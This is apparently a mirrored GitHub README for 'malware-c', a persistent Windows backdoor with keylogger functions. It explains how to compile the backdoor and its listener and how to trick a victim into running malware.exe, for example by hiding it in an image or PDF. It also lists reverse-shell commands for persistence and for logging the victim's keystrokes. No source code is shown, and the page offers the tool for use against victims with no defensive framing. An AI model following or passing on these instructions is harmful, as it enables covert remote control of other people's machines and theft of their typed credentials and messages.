Giter VIP home page Giter VIP logo

malware-c's Introduction

malware-c

A persistent backdoor written in c,with keylogger functions. First you need to change your ip address (sudo ifconfig: eth0 inet) on the backdoor.c .

REQUIREMENTS: Mingw-w64(for compile the 2 c files) apt-get update apt-get install mingw-w64

COMPILATION: For server.c: "gcc server.c -o server" For backdoor.c: "i686-w64-mingw32-gcc -o malware.exe backdoor.c -lwsock32 -lwininet"

HOW TO USE PROGRAMS:

In your kali machine you need to start the server with this command "./server" The server listens for incoming connection (victim machine) The victim machine need to open the malware.exe for create a connection with the server (TIP: You could hide the backdoor in an image, or in a pdf file) When the victim open the virus in your kali machine will see that there is an open shell where you can execute various tasks.

THE TASKS THAT THE REVERSE SHELL CAN EXCECUTE

  • With "persist" you will make the malware persistent so whenever the victim will reboot the machine the virus will remains active -With "keylog_start" you will create a new file named windows.txt, in this file there are all the words written by the victim -Enter "cd " for changing directory -With "q" you will quit from the shell
  • You can also use all of the default windows cmd task

malware-c's People

Contributors

francescolucarini avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.